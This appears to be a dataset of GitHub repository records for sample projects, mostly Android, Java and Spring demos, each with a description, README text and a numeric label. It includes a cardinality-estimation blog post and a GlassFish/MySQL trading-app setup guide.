Pickr [![Build Status](https://travis-ci.org/hitherejoe/Pickr.svg?branch=master)](https://travis-ci.org/hitherejoe/Pickr) ===== <p align="center"> <img src="images/devices.png" alt="Device screenshots"/> </p> A simple demo application that demonstrates the use of the Place Picker and Autocomplete functionality found within Google Play Services. The project is setup using: - Functional tests with [Espresso](https://code.google.com/p/android-test-kit/wiki/Espresso) - Unit tests with [Robolectric](http://robolectric.org/) - [Google Play Services](https://developers.google.com/android/guides/overview) - [RxJava](https://github.com/ReactiveX/RxJava) and [RxAndroid](https://github.com/ReactiveX/RxAndroid) - [Retrofit](http://square.github.io/retrofit/) and [OkHttp](https://github.com/square/okhttp) - [Dagger 2](http://google.github.io/dagger/) - [SqlBrite](https://github.com/square/sqlbrite) - [EasyAdapter](https://github.com/ribot/easy-adapter) - [Butterknife](https://github.com/JakeWharton/butterknife) - [Timber] (https://github.com/JakeWharton/timber) - [Mockito](http://mockito.org/) Requirements ------------ - [Android SDK](http://developer.android.com/sdk/index.html). - Android [5.1 (API 22) ](http://developer.android.com/tools/revisions/platforms.html#5.1). - Android SDK Tools - Android SDK Build tools 23.0.1 - Android Support library 23.0.1 - Android Support Repository Building -------- To build, install and run a debug version, run this from the root of the project: ./gradlew installDebug Testing -------- For Android Studio to use syntax highlighting for Automated tests and Unit tests you **must** switch the Build Variant to the desired mode. To run **unit** tests on your machine using [Robolectric] (http://robolectric.org/): ./gradlew testDebug To run **automated** tests on connected devices: ./gradlew connectedAndroidTest
1
android-cjj/JJSwipeLayout
The Sample Swipe Layout!
null
JJSwipeLayout ============================================= The Sample Swipe Layout! --------------------------------------------- 滑动删除的比较出名的的有代码家的[https://github.com/daimajia/AndroidSwipeLayout](https://github.com/daimajia/AndroidSwipeLayout)和Mr.Bao的[https://github.com/baoyongzhang/SwipeMenuListView](https://github.com/baoyongzhang/SwipeMenuListView),但是,代码家的那个功能太强大了,我之前用了,有点小bug,看着那么多的代码,心好累,自己改不了bug,我发现如果你不是要求那么多,只是像qq那样的简单功能的话,完全可以自己实现,Mr.bao那个是listView的,如果项目中是recyclerView的朋友要实现,可能又要大改了。。。 所以,我自己又重复造轮子了,请原谅我的无理取闹,明明别人已经写好了,我还没事找事,我只是实现了lv和rv都可以适应,一个方向的SwipeLayout... 效果: ---------------------------------------- ![](https://camo.githubusercontent.com/df11f2a298e5c3aa843f63e81516cdb01e04e019/687474703a2f2f7777332e73696e61696d672e636e2f6d773639302f36313064633033346a7731656a703362736b36747667323039353032626a74632e676966) (原谅我无耻的偷了代码家的动图,啊哈哈) Base layout --------------------------- ![](https://github.com/android-cjj/JJSwipeLayout/blob/master/img/a.jpg) swipe for listview ------------------------------- ![](https://github.com/android-cjj/JJSwipeLayout/blob/master/img/b.jpg) swipe for recyclerview -------------------- ![](https://github.com/android-cjj/JJSwipeLayout/blob/master/img/c.jpg) 使用说明 -------------------------------------------------- ```xml <com.cjj.swipe.JJSwipeLayout android:id="@+id/swipelayout" android:layout_width="match_parent" android:layout_height="wrap_content" xmlns:android="http://schemas.android.com/apk/res/android"> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" android:orientation="vertical" android:gravity="center" android:layout_width="match_parent" android:layout_height="80dp"> <!--这一层是内容界面,外层包围内容的需要是ViewGroup,所以可以是Framelayout,RelativeLayout--> </LinearLayout> <LinearLayout android:id="@+id/bottom_wrapper_2" android:layout_width="210dp" android:layout_height="80dp"> <!--这一层是滑动的菜单界面,可以添加删除,喜欢等功能view--> </LinearLayout> </com.cjj.swipe.JJSwipeLayout> ``` 具体你可以看源码demo,使用很简单的,呵呵。 其他 ------------------------------------------------------- jjSwipeLayout.isOpen()//是判断打开的状态 jjSwipeLayout.setOnSwipeBackListener()//监听swipe jjSwipeLayout.close()//关闭swipelayout jjSwipeLayout.open()//打开swipelayout jjSwipeLayout.setAlphaAnim(true);//设置菜单滑动出来的时候有透明动画效果 If you want to support me,you can follow me on GitHub: https://github.com/android-cjj. License ======= The MIT License (MIT) Copyright (c) 2015 android-cjj Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
1
mechero/spring-boot-jboss-wildfly
Spring Boot application sample that can be deployed to a JBoss Wildfly application server
docker jboss spring-boot spring-mvc wildfly wildfly13
# Spring Boot - JBoss Wildfly demo app ## Description This is a sample project that shows how to deploy a `war` file with a Spring Boot 2 application on a Wildfly server, included in a post at [The Practical Developer site](https://thepracticaldeveloper.com/2017/09/02/how-to-deploy-a-spring-boot-war-in-wildfly-jboss/) ## Instructions You need to have a JDK 11 installed in your system. Then, run the script `docker-build.sh` (or the commands inside if you're in Windows) and you will generate an image with a sample Spring Boot application packaged in a war file and deployed to Wildfly and Tomcat. The complete instructions [are here](https://thepracticaldeveloper.com/2017/09/02/how-to-deploy-a-spring-boot-war-in-wildfly-jboss/).
1
mobindustry/emojikeyboard
mobindustry - Sample of emoji keyboard
null
# EmojiKeyboard Telegram like implementation for emoticons that displays in the app as a pop-up over the soft keyboard ![Screenshot](https://github.com/frontiertsymbal/emoji_keyboard/blob/master/EmojiKeyboard.png) ### Requirements The library requires Android API Level 14+. ## Integration * Download and unzip the project you've just downloaded * Import the emojilib module in your Android Studio project (File > New > Import Module) * Add module to build.gradle ```groovy dependencies { compile project (':emojilib') } ``` * Enjoy! ## Usage You may use the code in two ways - with input panel and without it. ## Keyboard with input panel ### your_activity.xml Create container for input panel in your activity xml file ``` xml <FrameLayout android:id="@+id/root_frame_layout" android:layout_width="match_parent" android:layout_height="wrap_content" android:layout_gravity="bottom" > </FrameLayout> ``` ### YourActivity.java ``` java private FrameLayout mFrameLayout; private EmojiPanel mPanel; private EmojiParser mParser; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.your_activity); mFrameLayout = (FrameLayout) findViewById(R.id.root_frame_layout); //Create new panel, set the container in which the panel will be placed and set ClickCallback to receive Spanned string with emoji and path to sticker image. mPanel = new EmojiPanel(this, mFrameLayout, new EmojiPanel.EmojiClickCallback() { @Override public void sendClicked(Spannable span) { //do something with received Spannable with emoji } @Override public void stickerClicked(String path) { //do something with received path to Sticker image } }); //Set default icons for buttons mPanel.iconsInit(); //or if you need custom icons for buttons mPanel.iconsInit(R.drawable.ic_send_smile_levels, R.drawable.forward_blue); //initialise panel mPanel.init(); //if you need parse Spannable from String with emoji mParser = mPanel.getParser(); Spannable parsedString = mParser.parse(textView.getText().toString()); } @Override protected void onPause() { super.onPause(); mPanel.dissmissEmojiPopup(); } @Override public void onBackPressed() { if(mPanel.isEmojiAttached()) { mPanel.dissmissEmojiPopup(); } else { super.onBackPressed(); } } ``` Create level-list xml to customize icons for smile/keyboard button in drawable ### ic_send_smile_levels.xml ``` xml <?xml version="1.0" encoding="utf-8"?> <level-list xmlns:android="http://schemas.android.com/apk/res/android"> <item android:drawable="@drawable/ic_msg_panel_kb" android:maxLevel="0"/> <item android:drawable="@drawable/doc_blue" android:maxLevel="1"/> </level-list> ``` These actions enough to enable you to use the keyboard. ## Keyboard without input panel To use keyboard see KeyboardActivity.java code in sample project ## Current stickers To add your own stickers on the keyboard you need to put them in a /assets/stickers/ directory ###### Note This code has been carefully excised out of the project at https://github.com/rovkinmax/tchalange
1
marcfasel/SessionInCookie
Sample code to demonstrate the Session In Cookie pattern
null
# SessionInCookie Sample Application # This application is an implementation of the SessionInCookie pattern in Java. It has a CookieSessionFilter that serialises and deserialises the session attributes to and from a cookie. To demonstrate the functionality a sample SpingMVC application is included. Deploy the application to your favourite servlet container, and point your browser to [http://localhost:8080/SessionInCookie](http://localhost:8080/SessionInCookie "SessionInCookie"). The application allows you to log in, in which case a user object is placed in the session. You then proceed into the secured part of the application, which can only be viewed if a user is logged in and this user object is available in the session. This is controlled by a SecurityFilter, which issues an HTTP error 401 "Access denied" in case you are not logged in. The 401 page defined in the web.xml is shown in this case. The CookieSessionFilter is a base implementation of the pattern as shown in part of my [blog](http://blog.shinetech.com/2012/12/18/simple-session-sharing-in-tomcat-cluster-using-the-session-in-cookie-pattern/) on the Session-In-Cookie pattern. The project also contains an AdvancedSessionCookieFilter together with an AdvancedCookieSession. This filter also implements session timeouts, encryption, and signing of the cookie. These topics will be covered by the second part of my blog.
1
elechantelepate/bip_hack
Sample app for hacking the BIP! card on the Santiago Public Transit system.
null
null
1
tomsquest/java-agent-asm-javassist-sample
Sample maven project containing a Java agent and examples of bytecode manipulation with ASM and Javassist
null
# Sample Java Agent and Bytecode manipulation Sample maven project containing a Java agent and examples of bytecode manipulation with ASM and Javassist. See article on my blog : http://tomsquest.com/blog/2014/01/intro-java-agent-and-bytecode-manipulation/ ## Build ``` $ # From the root dir $ mvn package ``` ## Run ``` $ # From the root dir $ java -javaagent:agent/target/agent-0.1-SNAPSHOT.jar -jar other/target/other-0.1-SNAPSHOT.jar ```
1
cscotta/recordinality
Implementation of 'Recordinality' cardinality estimation sketch with distinct value sampling
null
#### Cardinality Estimation and Distinct Value Sampling with Recordinality ###### C. Scott Andreas | Aug 19, 2013 **Cardinality Estimation** Determining the number of unique elements that make up a stream is a frequently-encountered problem in stream processing. A few applications include counting the number of unique visitors to a website or determining the number of unique hosts communicating with an application cluster. In both cases, the number can be arbitrarily large, making it infeasible to maintain a map containing each unique value and just counting the elements. Instead, we turn to a category of algorithms called "[sketches](http://blog.aggregateknowledge.com/2011/09/13/streaming-algorithms-and-sketches/)." Sketches help us estimate the cardinality of infinite streams using very little memory and with bounded error estimates. [HyperLogLog](http://blog.aggregateknowledge.com/2012/10/25/sketch-of-the-day-hyperloglog-cornerstone-of-a-big-data-infrastructure/) is an excellent choice for streaming cardinality estimation in most cases. However, HLL is simply an estimator - it is a tool that does one thing, and one thing very well. At Aggregate Knowledge's May SketchConf, Jérémie Lumbroso introduced me to another lesser-known sketch called "Recordinality." Here is [the paper](http://www-apr.lip6.fr/~lumbroso/Publications/HeLuMaVi12.pdf) describing it. **Recordinality** Recordinality is unique in that it provides cardinality estimation like HLL, but also offers "distinct value sampling." This means that Recordinality can allow us to fetch a random sample of distinct elements in a stream, invariant to repetition. Put more succinctly, given a stream of elements containing 1,000,000 occurrences of 'A' and one occurrence each of 'B' - 'Z', the probability of any letter appearing in our sample is equal. Moreover, we can also efficiently store the number of times elements in our distinct sample have been observed. This can help us to understand the distribution of occurrences of elements in our stream. With it, we can answer questions like "do the elements we've sampled present in a power law-like pattern, or is the distribution of occurrences relatively even across the set?" **The Algorithm** Beyond these unique properties, Recordinality is especially interesting due to its simplicity. Here's how it works: 1. Initialize a set of size k (the size of this set determines the accuracy of our estimates) 2. Compute the hash of each incoming element in the stream using a hash function such as [MurmurHash3](https://sites.google.com/site/murmurhash/). 3. If the k-set is not full, insert the hash value. If the set is full, determine if the value of the hash is greater than the lowest hash currently in the set. If so, replace it. If not, ignore it. 4. Each time we add or replace an element in the k-set, increment a counter. The premise is straightforward: the cardinality of a stream can be estimated by hashing each element to a random value and counting the number of times a set containing the max of these values is mutated. We gain unique sampling if we switch from a set to a map and store the original value in our k-set. We gain counts of unique values observed by storing both the original value and incrementing a counter each time it's observed. In addition to being easy to reason about, it's also extraordinarily efficient. The common case requires only hashing an element and comparing two integers. **Implementing Recordinality** Interest piqued, Jérémie challenged me over dinner to implement it. Armed with Timon's advice on "[how to implement a paper](http://taco.cat/files/Screen%20Shot%202013-08-19%20at%202.58.36%20PM-N2VAMCNBev.png)" ([slides](https://docs.google.com/presentation/d/12mMdn5cjA-MhrbJSP6ThjIAs-YACWJ1p6BeSTXW0P4Q/edit?usp=sharing)), I read and re-read it making notes. A Saturday morning found me at [Sightglass](https://sightglasscoffee.com/) sitting down with the paper, a cup of Blueboon, and my laptop to begin implementation. One cup and a couple bugs later, I arrived at a working implementation of Recordinality and shuffled home to verify my results against those claimed by the paper against a known input set, which matched. Here's an implementation of Recordinality in Java, comments added: https://github.com/cscotta/recordinality/blob/master/src/main/java/com/cscotta/recordinality/Recordinality.java This implementation is both threadsafe and lockless in the common case, allowing all mutators and readers safe concurrent access without synchronization. If cardinality estimation with distinct value sampling is of interest to you, please consider this implementation as a starting point. Translations to other languages should be straightforward; please let me know if you attempt one and I'll list it here. **Performance** The Recordinality paper includes mean cardinality and error estimates for k-values from 4 to 512 against a publicly-available dataset – namely, the text of A Midsummer Night's Dream. Here is a comparison of the results included in the paper versus those emitted by the unit test included with this implementation. The values recorded below are the results of 10,000 runs. [Note: The source text used in the paper is listed as containing 3031 distinct words. The copy I've obtained for verification and based implementation stats on below from Project Gutenberg contained 3193 distinct words. It is included in this repository.] | Size | Paper Mean (Expected: 3031) | Paper Error | Impl Mean (Expected: 3193) | Impl Error | Mean Run Time | |--------|---------------------------|-------------|----------------------------|------------|---------------| | 4 | 2737 | 1.04 | 3154 | 1.63 | 3ms | | 8 | 2811 | 0.73 | 3187 | 0.91 | 3ms | | 16 | 3040 | 0.54 | 3202 | 0.55 | 3ms | | 32 | 3010 | 0.34 | 3179 | 0.34 | 3ms | | 64 | 3020 | 0.22 | 3197 | 0.22 | 3ms | | 128 | 3042 | 0.14 | 3193 | 0.13 | 4ms | | 256 | 3044 | 0.08 | 3191 | 0.08 | 4ms | | 512 | 3043 | 0.04 | 3192 | 0.04 | 4ms | You can run this test yourself by cloning the repo and typing `mvn test`. Here is an example of the expected output: https://gist.github.com/pkwarren/6275129 **Epilogue** The implementation of Recordinality was driven by practical needs as much as it was by a desire to encourage greater cross-pollination between industry and academia. This is the first known open source implementation of this algorithm I'm aware of, and the only cardinality estimation sketch that provides distinct value sampling and the frequency of each. Working with Jérémie to understand and implement Recordinality was a pleasure (as most evenings talking shop that end at 2 am at Pilsner Inn are)! It's always a delight to see unique and useful algorithms spawn open source implementations for use by others coming after. Thanks, Jérémie! --- Here are the [slides](https://speakerdeck.com/timonk/philippe-flajolets-contribution-to-streaming-algorithms) presented by Jérémie, along with a [video of the original presentation](http://www.youtube.com/watch?v=Xigaf8npHoI). **Update:** Thanks to Philip Warren (@pkwarren) for catching a check against CSLM.size() that should have been short-circuited by a call to cachedMin.get() in the common case. Updated run time stats and performance above following this change. A few more similar changes will follow shortly. **Update 2:** A much bigger thanks to Philip for [this commit](https://github.com/cscotta/recordinality/commit/a5579fa6909ee0746d4da9da0efcd6b924a260cc), which removes the use of CSLM.size() entirely. Previously, this implementation's time complexity varied with the size of the k-map. This commit eliminates this covariance. The initial version of this test took a mean of 116ms per run at k-512. Philip's changes bring it down to 4ms.
0
archfirst/bullsfirst-server-java
A sample trading application demonstrating best practices in software development
null
# bullsfirst-server-java Bullsfirst is a sample trading application demonstrating best practices in software development. You can read more about it on [archfirst.org](https://archfirst.org/bullsfirst/). ## Requirements - [JDK 7](http://www.oracle.com/technetwork/java/javase/downloads/index.html) - [Apache Maven 3.x](https://maven.apache.org/) - [MySQL 5.x](http://dev.mysql.com/downloads/) - [mysql-connector-java 5.x](http://dev.mysql.com/downloads/connector/j/) - [GlassFish 3.1.2.2](http://download.java.net/glassfish/3.1.2.2/release/glassfish-3.1.2.2.zip) ## Build Instructions ### Install quickfixj in Maven repository This step is required because connecting to the quickfixj maven repository was giving the following error: No connector available to access repository MarketceteraRepo (>http://repo.marketcetera.org/maven) of type default using the available factories WagonRepositoryConnectorFactory - Download quickfixj 1.5.0 from http://sourceforge.net/project/showfiles.php?group_id=163099 and unzip it at `C:/lib/quickfixj-1.5.0` (you will have to rename to this). Run the following command to install the library in the Maven repository: `mvn install:install-file -Dfile=C:/lib/quickfixj-1.5.0/quickfixj-all-1.5.0.jar -DgroupId=quickfixj -DartifactId=quickfixj-all -Dversion=1.5.0 -Dpackaging=jar -DgeneratePom=true` ### Start MySQL Database Server and login as root - Start MySQL System Tray Monitor (from Start > All Programs > MySQL). - In the system tray, right click on MySQL System Tray Monitor and select Start Instance. - Now login to mysql on the command line. ``` > mysql --user=root --password Enter password: xxxx mysql> show databases; ``` ### Create a Database for Bullsfirst Exchange mysql> create database bfexch_javaee; mysql> create user 'bfexch_javaee'@'localhost' identified by '<password>'; mysql> grant all on bfexch_javaee.* TO 'bfexch_javaee'@'localhost'; ### Create a Database for Bullsfirst OMS mysql> create database bfoms_javaee; mysql> create user 'bfoms_javaee'@'localhost' identified by '<password>'; mysql> grant all on bfoms_javaee.* TO 'bfoms_javaee'@'localhost'; ### Configure GlassFish - Open a Command shell and traverse to GLASSFISH_HOME\bin - Stop the GlassFish server. ``` asadmin stop-domain domain1 ``` - Copy the MySQL driver (mysql-connector-java-5.1.13-bin.jar) to GLASSFISH_HOME\lib. - Type the following command to create a master-password file under GLASSFISH_HOME\domains\domain1 (required by maven-glassfish-plugin): ``` asadmin change-master-password --savemasterpassword=true domain1 Enter the current master password> changeit Enter the new master password> [new-password] Enter the new master password again> [new-password] ``` - Type the following command at the command prompt to start the server: ``` asadmin start-domain domain1 ``` - Login to the GlassFish admin console as admin (url http://localhost:4848) - Add Hibernate JPA provider (in addition to the default TopLink JPA provider). - In the navigation bar, click on Update Tool. - Select Component called hibernate and click Install. - Stop GlassFish before proceeding to the next step. (Hibernate JPA provider will be automatically recognized during the next startup): ``` asadmin stop-domain domain1 ``` - Unfortunately what gets installed is hibernate 3.5.0 which is incompatible with Bullsfirst. Replace it with hibernate 3.6.0. To do this, pick up the hibernate3.jar from hibernate-3.6.0.Final distribution and drop it in GLASSFISH_HOME\lib, overwriting the original file. ### Configure GlassFish for slf4j Logging Based on [this](http://hwellmann.blogspot.com/2010/12/glassfish-logging-with-slf4j-part-2.html) article - Copy the following JARs to GLASSFISH_HOME\lib\endorsed: ``` wget http://central.maven.org/maven2/org/slf4j/jul-to-slf4j/1.6.1/jul-to-slf4j-1.6.1.jar wget http://central.maven.org/maven2/org/slf4j/slf4j-api/1.6.1/slf4j-api-1.6.1.jar wget http://central.maven.org/maven2/org/slf4j/slf4j-log4j12/1.6.1/slf4j-log4j12-1.6.1.jar wget http://mirrors.ibiblio.org/pub/mirrors/maven2/log4j/log4j/1.2.8/log4j-1.2.8.jar log4j-config-xxx.jar (from GlassFish Logging Configuration) (choose between dev or prod) ``` - Edit GLASSFISH_HOME\domains\domain1\config\domain.xml and add the following properties in the jvm-options section (there are two such sections – put these lines in the first section that’s under <config name="server-config">): ``` <jvm-options>-Djava.util.logging.config.file=${com.sun.aas.instanceRoot}/config/my_logging.properties</jvm-options> <jvm-options>-Dlog4j.log.file=${com.sun.aas.instanceRoot}/logs/glassfish.log</jvm-options> ``` - Create my_logging.properties file as specified in the jvm-options above under GLASSFISH_HOME\domains\domain1\config with the following contents: ``` handlers = org.slf4j.bridge.SLF4JBridgeHandler com.sun.enterprise.server.logging.GFFileHandler.flushFrequency=1 com.sun.enterprise.server.logging.GFFileHandler.file=${com.sun.aas.instanceRoot}/logs/server.log com.sun.enterprise.server.logging.GFFileHandler.rotationTimelimitInMinutes=0 com.sun.enterprise.server.logging.GFFileHandler.logtoConsole=false com.sun.enterprise.server.logging.GFFileHandler.rotationLimitInBytes=2000000 com.sun.enterprise.server.logging.GFFileHandler.alarms=false com.sun.enterprise.server.logging.GFFileHandler.formatter=com.sun.enterprise.server.logging.UniformLogFormatter com.sun.enterprise.server.logging.GFFileHandler.retainErrorsStasticsForHours=0 ``` - Restart GlassFish. You will now see only a few messages in server.log, all the rest go to glassfish.log. ### Create JDBC Connection Pools on GlassFish #### Create bfexch_javaee Connection Pool - Login to the GlassFish admin console as admin (url http://localhost:4848) - In the navigation bar, click on Resources > JDBC > Connection Pools - Click New on the Connection Pools page. - Create a new connection pool using the following parameters and click Next ``` Pool Name: bfexch_javaee Resource Type: javax.sql.ConnectionPoolDataSource Database Vendor: MySql ``` - Fill in the following properties and click Finish ``` User: bfexch_javaee Password: bfexch_javaee (put the correct password for your database) URL & Url: jdbc:mysql://localhost:3306/bfexch_javaee ``` - You will now be on the JDBC Connection Pools page. Click on the connection pool you just created and then click on Ping to make sure the connection is setup properly. - In the navigation bar, click on Resources > JDBC > JDBC Resources - Click New on the JDBC Resources page. - Create a new JDBC resource using the following parameters and click OK ``` JNDI Name: bfexch_javaee_connection_pool Pool Name: bfexch_javaee ``` #### Create bfoms_javaee Connection Pool Follow the same steps above but replace `bfexch_javaee` with `bfoms_javaee` (remember to put the correct database password) ### Create JDBC Security Realm - In the navigation bar, click on Configurations > server-config > Security > Realms - Click New. - Fill in the Fields as follows: - Name: bullsfirst-javaee - Class Name: com.sun.enterprise.security.auth.realm.jdbc.JDBCRealm - JAAS Context: jdbcRealm - JNDI (datasource): bfoms_javaee_connection_pool - User Table: Users - User Name Column: username - Password Column: passwordHash - Group Table: UserGroup - Group Name Column: groupname - Digest Algorithm: MD5 - Encoding: Base64 ### Configure JMS on GlassFish (Open MQ) - In the navigation bar, click on Configurations > server-config > Java Message Service - Confirm that the Type field is set to EMBEDDED - In the navigation bar, click on Resources > JMS Resources > Connection Factories - Click on New... - Fill in the following fields: ``` Pool Name: jms/ConnectionFactory Resource Type: javax.jms.ConnectionFactory ``` - Click Ok. This creates a connection factory called jms/ConnectionFactory and also (under Connectors) - a Connector Resource called `jms/ConnectionFactory` - a Connection Pool called `jms/ConnectionFactory` - In the navigation bar, click on Resources > JMS Resources > Destination Resources - Click on New... - Fill in the following fields (this step also creates an Admin Object resource called `jms/OmsToExchangeQueue`): ``` JNDI Name: jms/OmsToExchangeQueue Physical Destination Name: OmsToExchangeQueue Resource Type: javax.jms.Queue ``` - Similarly create two more queues and a topic (even though we don’t have a Spring OMS yet, the queue must be created. The exchange expects it to be there). ``` JNDI Name: jms/ExchangeToOmsJavaeeQueue Physical Destination Name: ExchangeToOmsJavaeeQueue Resource Type: javax.jms.Queue JNDI Name: jms/ExchangeToOmsSpringQueue Physical Destination Name: ExchangeToOmsSpringQueue Resource Type: javax.jms.Queue JNDI Name: jms/ExchangeMarketPriceTopic Physical Destination Name: ExchangeMarketPriceTopic Resource Type: javax.jms.Topic ``` - Expose the dead message queue (mq.sys.dmq) to JNDI by creating a resource as follows: ``` JNDI Name: jms/DeadMessageQueue Physical Destination Name: mq.sys.dmq Resource Type: javax.jms.Queue ``` - You can use imqcmd (under C:\apps\glassfish-3.1.2.2\mq\bin) to manage the queues. Default credentials to run this command are admin/admin. ``` To query a queue: imqcmd query dst -t q -n ExchangeToOmsJavaeeQueue imqcmd query dst -t q -n mq.sys.dmq (dead message queue) To purge a queue: imqcmd purge dst -t q -n ExchangeToOmsJavaeeQueue imqcmd purge dst -t q -n mq.sys.dmq (dead message queue) ``` ### Build Maven Projects Either build projects one at a time as described below or run the `build-all.bat` batch file to build all projects in one shot. #### Archfirst Common Libraries - Open a Command shell and traverse to SRC_DIR\java\projects\archfirst-common: - Type the following command at the command prompt to build the project ``` mvn clean install ``` #### Bullsfirst Common Libraries - Open a Command shell and traverse to SRC_DIR\java\projects\bullsfirst-common: - Type the following command at the command prompt to build the project ``` mvn clean install ``` #### Bullsfirst Exchange - Traverse to SRC_DIR\java\projects\bullsfirst-exchange-javaee: - Type the following command at the command prompt to build the project ``` mvn clean install ``` - Create database schema and import data ``` cd bfexch-ddl create-schema import ``` - Deploy application to Glassfish ``` cd ..\bfexch-javaee-web mvn glassfish:deploy (assuming that GlassFish server is running) ``` #### Bullsfirst OMS Common - Traverse to SRC_DIR\java\projects\bullsfirst-oms-common: - Type the following command at the command prompt to build the project ``` mvn clean install ``` - Create database schema and import data ``` cd bfoms-common-ddl create-schema import (optional – create jhorner user) ``` #### Bullsfirst Java EE - Traverse to SRC_DIR\java\projects\bullsfirst-oms-javaee: - Type the following command at the command prompt to build the project ``` mvn clean install ``` - Deploy application to Glassfish ``` cd bfoms-javaee-web mvn glassfish:deploy (assuming that GlassFish server is running) ``` ### Verify the installation - Point your browser to http://localhost:8080/bfexch-javaee to verify that the Exchange app comes up - Point your browser to http://localhost:8080/bfoms-javaee to verify that the OMS app comes up ### Build Bullsfirst jQuery-Backbone Client - See instructions [here](https://github.com/archfirst/bullsfirst-jquery-backbone) to build the Bullsfirst client - Deploy the client at port 9000 (since port 8080 is taken by GlassFish). ### Start Trading! Point your browser to [http://localhost:9000](http://localhost:9000) to start trading.
1
hitherejoe/WatchTower
A sample application created to test, explore and demonstrate the Proximity Beacon API
null
WatchTower =================== <p align="center"> <img src="images/ic_launcher_web.png" alt="Web Launcher"/> </p> Note: In order to use this app, you'll need to use the Google API Console to register your SHA1 token along with the package name, this app won't work otherwise. WatchTower is a simple application which was created to test and explore the functionality of the new [Proximity Beacon API](https://developers.google.com/beacons/proximity/guides). The application can be used to try out: - Registering Beacons - Updating Beacons - Viewing Beacons - Viewing Beacon Diagnostics - Viewing Beacon Attachments - Adding Beacon Attachments - Deleting Single Beacon Attachments - Deleting Batch Beacon Attachments by Type Some features are not very practical within a mobile-app (for example, adding json data to attachments), so these have not been included. <p align="center"> <img src="images/device_screenshot.png" alt="Web Launcher"/> </p> Note: This was built *quickly* to simply test the APIs functionality. If you come across any bugs please feel free to submit them as an issue, or open a pull request ;) For further information, please read the [supporting blog post](https://medium.com/ribot-labs/exploring-google-eddystone-with-the-proximity-beacon-api-bc9256c97e05). Requirements ------------ - [Android SDK](http://developer.android.com/sdk/index.html). - Android [5.1 (API 22) ](http://developer.android.com/tools/revisions/platforms.html#5.1). - Android SDK Tools - Android SDK Build tools 22.0.1 - Android Support Repository - Android Support library - Enabled [Unit Test support] (http://tools.android.com/tech-docs/unit-testing-support) Building -------- To build, install and run a debug version, run this from the root of the project: ./gradlew installRunDebug Testing -------- For Android Studio to use syntax highlighting for Automated tests and Unit tests you **must** switch the Build Variant to the desired mode. To run **unit** tests on your machine using [Robolectric] (http://robolectric.org/): ./gradlew testDebug To run **automated** tests on connected devices: ./gradlew connectedAndroidTest Attributions ------------ Thanks to the following for icons off of Noun Project: <br/> [Stéphanie Rusch](https://thenounproject.com/BeezkOt) - Beacon Icon <br/> [Abraham](https://thenounproject.com/gorilladigital) - Cloud Icon<br/> [S.Shohei](https://thenounproject.com/shohei909) - Battery Icon<br/> [Juergen Bauer](https://thenounproject.com/Juergen) - Alert Icon<br/> [Pham Thi Dieu Linh](https://thenounproject.com/phdieuli) - Attachment Icon<br/>
1
saki4510t/AudioVideoPlayerSample
Sample project to play audio and video from MPEG4 file using MediaCodec
null
AudioVideoPlayerSample ========================= Sample project to play audio and video from MPEG4 file using MediaCodec Copyright (c) 2014-2015 saki t_saki@serenegiant.com Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. All files in the folder are under this Apache License, Version 2.0. =========
1
johnhowe/BlueTerm
BlueTerm is the result of mix Term and BluetoothChat sample. http://pymasde.es/blueterm/
null
BlueTerm ======== BlueTerm is the result of mix Term and BluetoothChat sample. http://pymasde.es/blueterm/
0
jhipster/jhipster-sample-app-ng2
DEPRECATED now that Angular 2+ is the default - This is a sample application created with JHipster, using Angular 2
angular jhipster
# jhipsterSampleApplicationNG2 This application was generated using JHipster 4.12.0, you can find documentation and help at [http://www.jhipster.tech/documentation-archive/v4.12.0](http://www.jhipster.tech/documentation-archive/v4.12.0). ## Development Before you can build this project, you must install and configure the following dependencies on your machine: 1. [Node.js][]: We use Node to run a development web server and build the project. Depending on your system, you can install Node either from source or as a pre-packaged bundle. 2. [Yarn][]: We use Yarn to manage Node dependencies. Depending on your system, you can install Yarn either from source or as a pre-packaged bundle. After installing Node, you should be able to run the following command to install development tools. You will only need to run this command when dependencies change in [package.json](package.json). yarn install We use yarn scripts and [Webpack][] as our build system. Run the following commands in two separate terminals to create a blissful development experience where your browser auto-refreshes when files change on your hard drive. ./mvnw yarn start [Yarn][] is also used to manage CSS and JavaScript dependencies used in this application. You can upgrade dependencies by specifying a newer version in [package.json](package.json). You can also run `yarn update` and `yarn install` to manage dependencies. Add the `help` flag on any command to see how you can use it. For example, `yarn help update`. The `yarn run` command will list all of the scripts available to run for this project. ### Service workers Service workers are commented by default, to enable them please uncomment the following code. * The service worker registering script in index.html ``` <script> if ('serviceWorker' in navigator) { navigator.serviceWorker .register('./sw.js') .then(function() { console.log('Service Worker Registered'); }); } </script> Note: workbox creates the respective service worker and dynamically generate the `sw.js` ### Managing dependencies For example, to add [Leaflet][] library as a runtime dependency of your application, you would run following command: yarn add --exact leaflet To benefit from TypeScript type definitions from [DefinitelyTyped][] repository in development, you would run following command: yarn add --dev --exact @types/leaflet Then you would import the JS and CSS files specified in library's installation instructions so that [Webpack][] knows about them: Edit [src/main/webapp/app/vendor.ts](src/main/webapp/app/vendor.ts) file: ~~~ import 'leaflet/dist/leaflet.js'; ~~~ Edit [src/main/webapp/content/css/vendor.css](src/main/webapp/content/css/vendor.css) file: ~~~ @import '~leaflet/dist/leaflet.css'; ~~~ Note: there are still few other things remaining to do 